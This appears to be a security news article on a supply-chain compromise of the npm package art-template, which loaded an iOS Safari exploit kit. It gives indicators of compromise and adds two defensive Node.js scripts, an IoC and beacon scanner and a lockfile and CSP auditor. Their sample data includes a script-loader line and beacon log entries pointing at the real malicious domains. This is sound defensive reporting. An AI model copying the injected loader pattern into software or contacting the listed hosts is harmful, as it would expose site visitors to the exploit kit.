Security researchers have uncovered a sophisticated supply chain attack against art-template, one of the most widely used JavaScript templating libraries in the npm ecosystem. The compromised package was weaponized to silently deliver a full iOS browser exploit kit to every visitor of any web application that included the affected versions — turning thousands of legitimate websites into stealthy watering holes targeting Apple device users.
The attack was discovered and documented by researchers at Socket.dev, who linked the malicious implant to a previously documented iOS exploit framework known as the Coruna exploit kit. Their analysis, titled “Coruna Respawned,” reveals the attack represents a direct reuse or near-identical derivative of that earlier framework — now delivered through npm supply chain compromise.
How the Package Was Compromised
The art-template package, originally developed and maintained by an author known as “aui,” was transferred to an unknown actor under the pretense of continuing its maintenance. The new controller almost immediately began weaponizing the package against its user base. Issue reports flagging suspicious behavior from concerned users were quietly deleted by the new maintainer in an attempt to suppress discovery while malicious versions continued to be pushed to npm.
The attack followed an escalating injection pattern across multiple package releases:
- Version 4.13.3 — Used character encoding (`String.fromCharCode`) to obfuscate a loader pointing to a suspicious external domain
- Versions 4.13.5 and 4.13.6 — Dropped all obfuscation and injected a plaintext script loader directly into the package’s browser bundle file (`lib/template-web.js`)
Any web application that bundled versions 4.13.5 or 4.13.6 would silently load and execute the exploit kit in every visitor’s browser — with no visible sign that anything had changed in the application itself.
The iOS Browser Exploit Delivery Framework
The core of the attack is a sophisticated JavaScript implant that functions as a precision-targeted watering hole framework. Once injected through the compromised npm package, it quietly fingerprints each site visitor before deciding whether to proceed. Critically, the implant only activates on Safari running on iOS versions 11.0 through 17.2 and silently exits on Chrome, Firefox, Edge, Android, and iOS 17.3 or higher — making it nearly invisible to desktop security researchers.
The attack chain for a targeted victim proceeds as follows:
- The implant detects Safari on a vulnerable iOS version
- It begins beaconing the victim’s public IP address, iOS version string, and a campaign tracking code to a command-and-control server every ten seconds
- Five layers of anti-bot checks are run — including MathML rendering tests and a WebAssembly proof-of-work challenge — to confirm the target is a real person on real hardware
- Only after passing all checks does the framework fetch and execute the final payload from the C2 server
- Payload selection is tailored to the victim’s exact iOS version, with each of five version bands mapping to a different remote exploit module
CVE-2024-23222 Connection
The hard cutoff at iOS 17.3 is not arbitrary. It aligns precisely with the patch boundary for CVE-2024-23222, a WebKit vulnerability Apple fixed in that exact release. This precision strongly suggests the exploit kit was engineered for browser-level exploitation of a known-patched WebKit flaw — targeting the enormous installed base of devices that had not yet upgraded past iOS 17.2.
Scale of Exposure
The art-template library has accumulated tens of millions of downloads across its lifetime and is embedded in a large number of JavaScript projects globally. Any web application that bundled the affected versions became an unwitting delivery vehicle for a targeted mobile attack against its own users — with no visible change in application behavior and no indication to developers or site operators that exploitation was occurring.
The C2 infrastructure used a content-addressed module delivery system that concealed payloads from outside observers. Remote modules were fetched via URLs derived by hashing a secret session key with a module identifier, making them invisible to standard security scanners that do not know the key.
Indicators of Compromise
Security teams should immediately check for the following indicators in their environments:
- Presence of art-template versions 4.13.3, 4.13.5, or 4.13.6 in any JavaScript project
- Unexpected script loaders pointing to `v3.jiathis[.]com` in bundled JavaScript files
- Outbound connections to `utaq[.]cfww[.]shop` (watering hole hosting) or `l1ewsu3yjkqeroy[.]xyz` (C2 server)
- POST requests to `/api/ip-sync/sync` from client-side JavaScript
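The following Node.js script is an added example, not code from the Socket.dev report or the art-template project. It scans a built bundle and a handful of web-proxy log lines for the indicators listed above, normalising defanged forms such as `jiathis[.]com` first, and it flags any client that POSTs to the sync endpoint on a roughly ten-second cadence, which is the beacon interval the article describes. The bundle snippet and the log lines are constructed for the demonstration, and the log format `<ISO time> <client> <method> <url> <status>` is a hypothetical one; only the three domains and the `/api/ip-sync/sync` path come from the article.

```javascript
// Added example (not from the Socket.dev report or the art-template project):
// scan a built JavaScript bundle and web-proxy log lines for the indicators
// listed above, and flag clients that POST to the C2 sync endpoint on a roughly
// ten-second cadence. The bundle snippet and log lines are constructed; the
// domains and the path come from the article. The log format
// "<ISO time> <client> <method> <url> <status>" is hypothetical.
const IOC_DOMAINS = [
  'v3.jiathis.com',      // host of the injected script loader
  'utaq.cfww.shop',      // watering hole hosting
  'l1ewsu3yjkqeroy.xyz', // command-and-control server
];
const BEACON_PATH = '/api/ip-sync/sync';

function escapeRe(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Match IoC hosts on a label boundary so "notutaq.cfww.shop" is not reported,
// while subdomains of an IoC host (preceded by a dot) still are.
const DOMAIN_RE = new RegExp(
  '(^|[^a-z0-9-])(' + IOC_DOMAINS.map(escapeRe).join('|') + ')(?![a-z0-9-])',
  'gi',
);

// Return {indicator, line} hits for every IoC host or beacon path found in text.
// Defanged forms such as "jiathis[.]com" are normalised first so a threat
// report can be pasted in as-is.
function findIndicators(text) {
  const hits = [];
  text.replace(/\[\.\]/g, '.').split(/\r?\n/).forEach((line, idx) => {
    for (const m of line.matchAll(DOMAIN_RE)) {
      hits.push({ indicator: m[2].toLowerCase(), line: idx + 1 });
    }
    if (line.includes(BEACON_PATH)) hits.push({ indicator: BEACON_PATH, line: idx + 1 });
  });
  return hits;
}

// Parse one proxy log line in the hypothetical format described above.
function parseLogLine(line) {
  const [ts, client, method, url, status] = line.trim().split(/\s+/);
  return { t: Date.parse(ts), client, method, url, status: Number(status) };
}

// Group POSTs to the beacon path by client and report clients with at least
// minHits requests whose median inter-request gap is within tolerance of periodSec.
function findBeaconingClients(lines, { periodSec = 10, tolerance = 2, minHits = 3 } = {}) {
  const byClient = new Map();
  for (const line of lines) {
    const e = parseLogLine(line);
    if (e.method !== 'POST' || !e.url.includes(BEACON_PATH)) continue;
    if (!byClient.has(e.client)) byClient.set(e.client, []);
    byClient.get(e.client).push(e.t);
  }
  const flagged = [];
  for (const [client, times] of byClient) {
    if (times.length < minHits) continue;
    times.sort((a, b) => a - b);
    const gaps = times.slice(1).map((t, i) => (t - times[i]) / 1000).sort((a, b) => a - b);
    const medianGapSec = gaps[Math.floor(gaps.length / 2)];
    if (Math.abs(medianGapSec - periodSec) <= tolerance) {
      flagged.push({ client, hits: times.length, medianGapSec });
    }
  }
  return flagged;
}

// Constructed sample data: a bundle fragment with a loader call (the file name
// is a placeholder) and six proxy log lines for two clients.
const SAMPLE_BUNDLE = [
  '/*! art-template 4.13.5 */',
  'function loadScript(u){var s=document.createElement("script");s.src=u;document.head.appendChild(s)}',
  'loadScript("https://v3.jiathis.com/PLACEHOLDER.js");',
].join('\n');

const SAMPLE_LOG = [
  '2026-05-20T10:00:00Z 203.0.113.5 POST https://l1ewsu3yjkqeroy.xyz/api/ip-sync/sync 200',
  '2026-05-20T10:00:05Z 198.51.100.7 GET https://example.com/ 200',
  '2026-05-20T10:00:10Z 203.0.113.5 POST https://l1ewsu3yjkqeroy.xyz/api/ip-sync/sync 200',
  '2026-05-20T10:00:20Z 203.0.113.5 POST https://l1ewsu3yjkqeroy.xyz/api/ip-sync/sync 200',
  '2026-05-20T10:00:30Z 203.0.113.5 POST https://l1ewsu3yjkqeroy.xyz/api/ip-sync/sync 200',
  '2026-05-20T10:01:00Z 198.51.100.7 POST https://l1ewsu3yjkqeroy.xyz/api/ip-sync/sync 200',
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log('bundle hits:', findIndicators(SAMPLE_BUNDLE));
  console.log('log hits:', findIndicators(SAMPLE_LOG.join('\n')).length);
  console.log('beaconing clients:', findBeaconingClients(SAMPLE_LOG));
}
```

The cadence check is deliberately tolerant (median gap within two seconds of ten) because client clocks, proxy buffering and retries smear the interval; a single matching POST from a client is reported by `findIndicators` but not by `findBeaconingClients`, which needs at least three requests before it calls something a beacon.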
Immediate Mitigation Steps
Developers and security teams are urged to take the following actions immediately:
- Audit dependency trees — scan all projects for art-template versions 4.13.3 through 4.13.6 and update to a clean version
- Lock dependencies — use package-lock.json and integrity checks (SHA-512 hashes) to prevent unauthorized package updates
- Inspect browser bundle outputs — review compiled JavaScript bundles for unexpected `loadScript()` calls or external domain references
- Monitor outbound network requests — implement CSP (Content Security Policy) headers to restrict which external domains can be loaded by your web applications
- Conduct full security reviews — any application deployed with affected versions should undergo an immediate security review and consider notifying affected users
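As an added example of the dependency-audit, lockfile-integrity and CSP steps above (not code from the Socket.dev report or the art-template project), the Node.js script below walks a parsed `package-lock.json` in both the modern `packages` layout and the legacy nested `dependencies` layout, reports any art-template entry in the 4.13.3 through 4.13.6 range as critical, warns about entries that carry no `integrity` hash, and builds a `Content-Security-Policy` value that restricts `script-src` to the page's own origin plus an explicit allow-list. The lockfile object and the `sha512-PLACEHOLDER` value are constructed for the demonstration; the `/csp-report` endpoint and the `https://cdn.example.com` host are assumptions.

```javascript
// Added example (not from the Socket.dev report or the art-template project):
// audit a parsed package-lock.json for the affected art-template releases and
// for entries without an "integrity" hash, then build a Content-Security-Policy
// header that only allows scripts from the application's own origin and an
// explicit allow-list. The lockfile object below is constructed for this demo.
const AFFECTED = { name: 'art-template', min: [4, 13, 3], max: [4, 13, 6] };

// "4.13.5" -> [4, 13, 5]; prerelease suffixes are ignored for the range check.
function parseVersion(v) {
  return v.split('.').slice(0, 3).map((x) => parseInt(x, 10) || 0);
}

function cmpVersion(a, b) {
  for (let i = 0; i < 3; i++) {
    if ((a[i] || 0) !== (b[i] || 0)) return (a[i] || 0) - (b[i] || 0);
  }
  return 0;
}

function isAffected(name, version) {
  if (name !== AFFECTED.name) return false;
  const v = parseVersion(version);
  return cmpVersion(v, AFFECTED.min) >= 0 && cmpVersion(v, AFFECTED.max) <= 0;
}

// Walk both lockfile layouts: lockfileVersion 2/3 "packages" keyed by install
// path ("node_modules/art-template"), and the legacy nested "dependencies" tree
// (only used when "packages" is absent, so v2 files are not reported twice).
function auditLockfile(lock) {
  const findings = [];
  const check = (name, entry, where) => {
    if (!entry || !entry.version) return;
    if (isAffected(name, entry.version)) {
      findings.push({ severity: 'critical', name, version: entry.version, where,
        reason: 'known compromised release' });
    }
    if (!entry.integrity && !entry.link) {
      findings.push({ severity: 'warning', name, version: entry.version, where,
        reason: 'no integrity hash, so a tampered tarball would install unnoticed' });
    }
  };
  if (lock.packages) {
    for (const [path, entry] of Object.entries(lock.packages)) {
      if (path === '') continue; // the root project itself
      const idx = path.lastIndexOf('node_modules/');
      const name = idx === -1 ? path : path.slice(idx + 'node_modules/'.length);
      check(name, entry, path);
    }
  } else {
    const walk = (deps, prefix) => {
      for (const [name, entry] of Object.entries(deps || {})) {
        check(name, entry, prefix + name);
        walk(entry.dependencies, prefix + name + ' > ');
      }
    };
    walk(lock.dependencies, '');
  }
  return findings;
}

// A CSP that blocks script loads from any host not listed, so an injected
// loader pointing at an unlisted domain is refused by the browser and reported
// to the (assumed) /csp-report endpoint.
function buildCsp(allowedScriptHosts = [], reportUri = '/csp-report') {
  const scriptSrc = ["'self'", ...allowedScriptHosts].join(' ');
  return [
    "default-src 'self'",
    `script-src ${scriptSrc}`,
    "connect-src 'self'",
    "object-src 'none'",
    "base-uri 'self'",
    `report-uri ${reportUri}`,
  ].join('; ');
}

// Constructed lockfile; "sha512-PLACEHOLDER" stands in for a real hash and
// "example-helper" is a made-up package with no integrity field.
const SAMPLE_LOCK = {
  name: 'demo-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/art-template': { version: '4.13.5', integrity: 'sha512-PLACEHOLDER' },
    'node_modules/example-helper': { version: '1.3.0' },
    'node_modules/@scope/safe': { version: '2.0.0', integrity: 'sha512-PLACEHOLDER' },
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditLockfile(SAMPLE_LOCK));
  console.log(buildCsp(['https://cdn.example.com']));
}
```

Run it against a real lockfile with `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))` in place of `SAMPLE_LOCK`. The integrity warning matters because a lockfile pin alone only fixes the version string; it is the `sha512-` hash that makes npm refuse a tarball whose contents differ from what was originally resolved.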
This attack is a stark reminder that npm package maintainer transitions represent a significant supply chain risk. Security teams should monitor for ownership changes in critical dependencies and treat post-transfer package updates with elevated scrutiny.
Source: Cyber Security News, May 22, 2026